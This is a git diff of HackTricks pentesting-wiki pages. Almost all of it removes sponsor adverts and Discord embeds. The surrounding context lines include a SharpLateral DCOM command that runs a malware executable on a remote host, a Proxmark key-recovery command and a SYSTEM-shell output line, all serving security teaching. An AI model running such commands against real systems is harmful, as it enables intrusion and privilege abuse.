- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md index 7f46f1316..099ebf938 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md +++ b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ### Localhost ```bash @@ -226,11 +218,6 @@ image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing- * [https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25](https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25) * [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md index 626f8728f..d1a366eba 100644 --- a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md +++ b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md @@ -15,20 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** - ## Bsic Info Expression Language (EL) is integral in JavaEE for bridging the presentation layer (e.g., web pages) and application logic (e.g., managed beans), enabling their interaction. It's predominantly used in: @@ -275,18 +261,6 @@ Check [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https:// * [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools) * [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt) -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/pentesting-web/unicode-injection/unicode-normalization.md b/pentesting-web/unicode-injection/unicode-normalization.md index 042972c12..adde65a1e 100644 --- a/pentesting-web/unicode-injection/unicode-normalization.md +++ b/pentesting-web/unicode-injection/unicode-normalization.md @@ -15,20 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** - **This is a summary of:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Check a look for further details (images taken form there). ## Understanding Unicode and Normalization @@ -130,18 +116,6 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows t * [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work) * [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html) -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/pentesting-web/xs-search/css-injection/README.md b/pentesting-web/xs-search/css-injection/README.md index dbf69ef76..79765690d 100644 --- a/pentesting-web/xs-search/css-injection/README.md +++ b/pentesting-web/xs-search/css-injection/README.md @@ -15,13 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** ## CSS Injection @@ -490,12 +483,6 @@ So, if the font does not match, the response time when visiting the bot is expec * [https://infosecwriteups.com/exfiltration-via-css-injection-4e999f63097d](https://infosecwriteups.com/exfiltration-via-css-injection-4e999f63097d) * [https://x-c3ll.github.io/posts/CSS-Injection-Primitives/](https://x-c3ll.github.io/posts/CSS-Injection-Primitives/) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md b/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md index 409448366..580cf8ba0 100644 --- a/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md +++ b/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md @@ -17,14 +17,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Basic Information A **service worker** is a script run by your browser in the background, separate from any web page, enabling features that don't require a web page or user interaction, thus enhancing **offline and background processing** capabilities. Detailed information on service workers can be found [here](https://developers.google.com/web/fundamentals/primers/service-workers). By exploiting service workers within a vulnerable web domain, attackers can gain control over the victim's interactions with all pages within that domain. @@ -126,12 +118,6 @@ For an example of this check the reference link. * [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md b/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md index 51935e8d6..1d5a2c5f3 100644 --- a/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md +++ b/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md @@ -15,20 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** - ## Same Origin Method Execution There will be occasions where you can execute some limited javascript in a page. For example, in the case where you can[ **control a callback value that will be executed**](./#javascript-function). diff --git a/physical-attacks/physical-attacks.md b/physical-attacks/physical-attacks.md index fd90bd23b..9b01ac4dd 100644 --- a/physical-attacks/physical-attacks.md +++ b/physical-attacks/physical-attacks.md @@ -15,20 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - ---- - ## BIOS Password Recovery and System Security **Resetting the BIOS** can be achieved in several ways. Most motherboards include a **battery** that, when removed for around **30 minutes**, will reset the BIOS settings, including the password. Alternatively, a **jumper on the motherboard** can be adjusted to reset these settings by connecting specific pins. @@ -81,18 +67,6 @@ BitLocker encryption can potentially be bypassed if the **recovery password** is A new BitLocker recovery key can be added through social engineering tactics, convincing a user to execute a command that adds a new recovery key composed of zeros, thereby simplifying the decryption process. -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/reversing/common-api-used-in-malware.md b/reversing/common-api-used-in-malware.md index c7394dcd2..f757b6ee6 100644 --- a/reversing/common-api-used-in-malware.md +++ b/reversing/common-api-used-in-malware.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Generic ### Networking @@ -157,12 +149,6 @@ The malware will unmap the legitimate code from memory of the process and load a * **EAT** (**Export Address Table**) Hooks. This hooks can be done from **userland**. The goal is to hook exported functions by DLLs. * **Inline Hooks**: This type are difficult to achieve. This involve modifying the code of the functions itself. Maybe by putting a jump at the beginning of this. -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/reversing/reversing-tools-basic-methods/README.md b/reversing/reversing-tools-basic-methods/README.md index f5043d392..93915a040 100644 --- a/reversing/reversing-tools-basic-methods/README.md +++ b/reversing/reversing-tools-basic-methods/README.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## ImGui Based Reversing tools Software: @@ -430,12 +422,6 @@ So, in this challenge, knowing the values of the buttons, you needed to **press * [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering) * [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/stego/stego-tricks.md b/stego/stego-tricks.md index d927b6ce5..79aa7ee91 100644 --- a/stego/stego-tricks.md +++ b/stego/stego-tricks.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## **Extracting Data from Files** ### **Binwalk** @@ -238,12 +230,6 @@ For translating Braille, the [Branah Braille Translator](https://www.branah.com/ * [**https://0xrick.github.io/lists/stego/**](https://0xrick.github.io/lists/stego/) * [**https://github.com/DominicBreuker/stego-toolkit**](https://github.com/DominicBreuker/stego-toolkit) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/todo/hardware-hacking/uart.md b/todo/hardware-hacking/uart.md index ddb3b1284..ece41cdf1 100644 --- a/todo/hardware-hacking/uart.md +++ b/todo/hardware-hacking/uart.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## Basic Information @@ -210,18 +197,6 @@ This will list the possible contents from the EEPROM as per the signatures found Although, it is necessary to note that it's not always the case that the uboot is unlocked even if it is being used. If the Enter Key doesn't do anything, check for different keys like Space Key, etc. If the bootloader is locked and does not get interrupted, this method would not work. To check if uboot is the bootloader for the device, check the output on the UART Console while booting of the device. It might mention uboot while booting. -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/todo/radio-hacking/flipper-zero/README.md b/todo/radio-hacking/flipper-zero/README.md index a60141130..1df55556d 100644 --- a/todo/radio-hacking/flipper-zero/README.md +++ b/todo/radio-hacking/flipper-zero/README.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - With [**Flipper Zero**](https://flipperzero.one/) you can: * **Listen/Capture/Replay radio frequencies:** [**Sub-GHz**](fz-sub-ghz.md) @@ -36,12 +28,6 @@ With [**Flipper Zero**](https://flipperzero.one/) you can: **Other Flipper Zero resources in** [**https://github.com/djsime1/awesome-flipperzer**](https://github.com/djsime1/awesome-flipperzero) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md index 92c98d33f..0d5cb8a5a 100644 --- a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md +++ b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md @@ -15,13 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** ## Intro @@ -128,12 +121,6 @@ Get dBms of the saved frequencies * [https://docs.flipperzero.one/sub-ghz](https://docs.flipperzero.one/sub-ghz) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/todo/radio-hacking/proxmark-3.md b/todo/radio-hacking/proxmark-3.md index aa6c958e5..31a120f7e 100644 --- a/todo/radio-hacking/proxmark-3.md +++ b/todo/radio-hacking/proxmark-3.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Attacking RFID Systems with Proxmark3 The first thing you need to do is to have a [**Proxmark3**](https://proxmark.com) and [**install the software and it's dependencie**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux). @@ -82,13 +74,6 @@ proxmark3> script run mfkeys You can create a script to **fuzz tag readers**, so copying the data of a **valid card** just write a **Lua script** that **randomize** one or more random **bytes** and check if the **reader crashes** with any iteration. -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/windows-hardening/checklist-windows-privilege-escalation.md b/windows-hardening/checklist-windows-privilege-escalation.md index 363233ef8..7caef6944 100644 --- a/windows-hardening/checklist-windows-privilege-escalation.md +++ b/windows-hardening/checklist-windows-privilege-escalation.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) ### [System Info](windows-local-privilege-escalation/#system-info) @@ -132,12 +124,6 @@ Learn & practice GCP Hacking:
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/windows-hardening/lateral-movement/dcom-exec.md b/windows-hardening/lateral-movement/dcom-exec.md index 53641b751..32b6d02f6 100644 --- a/windows-hardening/lateral-movement/dcom-exec.md +++ b/windows-hardening/lateral-movement/dcom-exec.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## MMC20.Application **For more info about this technique chech the original post from [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/)** @@ -137,12 +129,6 @@ SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe * [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/) * [https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/windows-hardening/windows-local-privilege-escalation/access-tokens.md b/windows-hardening/windows-local-privilege-escalation/access-tokens.md index 7943d46ef..f82fbe5f0 100644 --- a/windows-hardening/windows-local-privilege-escalation/access-tokens.md +++ b/windows-hardening/windows-local-privilege-escalation/access-tokens.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## Access Tokens @@ -134,17 +121,6 @@ Take a look to [**all the possible token privileges and some definitions on this Learn more about tokens in this tutorials: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) and [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962) -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/windows-hardening/windows-local-privilege-escalation/integrity-levels.md b/windows-hardening/windows-local-privilege-escalation/integrity-levels.md index f9c0b49f6..67002229b 100644 --- a/windows-hardening/windows-local-privilege-escalation/integrity-levels.md +++ b/windows-hardening/windows-local-privilege-escalation/integrity-levels.md @@ -15,20 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** - ## Integrity Levels In Windows Vista and later versions, all protected items come with an **integrity level** tag. This setup mostly assigns a "medium" integrity level to files and registry keys, except for certain folders and files that Internet Explorer 7 can write to at a low integrity level. The default behavior is for processes initiated by standard users to have a medium integrity level, whereas services typically operate at a system integrity level. A high-integrity label safeguards the root directory. @@ -124,17 +110,6 @@ Not all files and folders have a minimum integrity level, **but all processes ar Due to the restrictions commented in this and the previous section, from a security point of view, it's always **recommended to run a process in the lower level of integrity possible**. -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/windows-hardening/windows-local-privilege-escalation/juicypotato.md b/windows-hardening/windows-local-privilege-escalation/juicypotato.md index f9d807f6a..0aeb60baf 100644 --- a/windows-hardening/windows-local-privilege-escalation/juicypotato.md +++ b/windows-hardening/windows-local-privilege-escalation/juicypotato.md @@ -15,20 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** - {% hint style="warning" %} **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_ {% endhint %} @@ -158,17 +144,6 @@ Then download [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/maste * [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md) -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md index 8e82096a0..755d23a07 100644 --- a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md +++ b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md @@ -15,20 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** - {% hint style="warning" %} **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works. {% endhint %} @@ -125,17 +111,6 @@ nt authority\system * [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) * [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato) -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\